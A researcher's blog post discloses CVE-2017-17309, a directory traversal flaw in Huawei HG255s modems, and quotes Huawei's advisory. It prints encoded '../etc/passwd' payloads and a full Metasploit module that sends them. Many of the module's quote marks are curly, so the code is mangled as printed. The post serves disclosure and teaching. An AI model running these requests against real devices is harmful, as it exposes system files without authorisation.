Directory Traversal Vulnerability in Huawei HG255s Products

I would like to talk about a vulnerability that we discovered in the past. I wanted to repost this nice security research so that it can be on my blog. This product we discovered actually belongs to Turkcell, which serves as a domestic internet infrastructure provider in Turkey. It was giving this modem to internet users as a standard modem. That’s why we can say that millions of people use it. In addition, Huawei has developed this product specifically for Turkcell. So consider the possibility of a cyber attack against a specific product used by a country. Fortunately, we well-meaning security researchers have reported the situation. When we did security research on this product, we noticed the Directory Traversal vulnerability and reported it. I even developed a metasploit module for this vulnerability.

Directory traversal, also known as “file path traversal” or “dot dot slash,” is a vulnerability that allows an attacker to access files and directories that are stored outside the root directory of a web application. This vulnerability occurs when the web application does not properly validate user input, allowing an attacker to manipulate the file path to access files and directories that are outside the root directory.

For example, consider a web application that allows users to upload images to a “photos” directory. If the web application does not properly validate the file path of the uploaded image, an attacker could potentially upload an image with a malicious file path such as “../../etc/passwd” in an attempt to access the system’s password file. This type of attack is possible because the “../” sequence in the file path tells the web application to go up one directory level. By using multiple “../” sequences, an attacker can traverse up multiple levels and potentially access sensitive files and directories that are stored outside the root directory of the web application.

To prevent directory traversal vulnerabilities, it is important for web developers to properly validate and sanitize user input to ensure that it does not contain any malicious file paths. This can be done by using techniques such as input validation, white listing, and sanitization. It is also important to properly secure the file system by setting appropriate permissions on sensitive files and directories to prevent unauthorized access.

What was the cause of the security vulnerability?

When you examine the metasploit module below, 4 different directories are affected by this vulnerability;

'/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
'/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
'/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
'/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'

The article that Huawei has published for us:

Huawei noticed that security researcher Ahmet Mersin revealed a directory traversal vulnerability in Huawei HG255s. Before this security researcher Barış Çağrı Yıldırım, Ahmet Mersin and Ismail Tasdelen have sent the vulnerability to Huawei PSIRT. Huawei immediately launched a thorough investigation.

Huawei has finished the investigation. Huawei HG255s is affected by this vulnerability (CVE-2017–17309) and Huawei has already provided a fix solution to the affected carrier. The carrier has released a fixed version. The affected products will receive a system update prompt and users can install the update to fix the vulnerability.

We express our appreciation for Barış Çağrı Yıldırım, Ahmet Mersin and Ismail Tasdelen’s concerns on Huawei products.

PoC Video :

vulnerability0lab youtube channel

CVSS Score :

Base Score: 7.5 HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Metasploit Code :

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#
##


class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient

   def initialize
       super(
           'Name'        => 'Huawei HG255 Directory Traversal',
           ‘Description’ => ‘Server Directory Traversal at Huawei HG255 by malicious GET requests’,
           ‘Author’      => ‘Ismail Tasdelen’,
           ‘License’     => MSF_LICENSE,
           ‘References’     =>
           [
              ['CVE', '2017-17309' ],
              ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
           ]
       )
       register_options(
           [
               Opt::RPORT(80)
           ], self.class
       )
   end

   def run
       urllist=[
           ‘/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
           ‘/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
           ‘/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
           ‘/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’]

       urllist.each do |url|
           begin
               res = send_request_raw(
               {
                       ‘method’=> ‘GET’,
                       ‘uri’=> url
               })

               if res
                   print_good(“Vulnerable! for #{url}”)
               else
                   print_status(“Vulnerable(no response) detected for #{url}”)
               end
           rescue Errno::ECONNRESET
               print_status(“Vulnerable(rst) detected for #{url}”)
           rescue Exception
               print_error(“Connection failed.”)
           end
       end
   end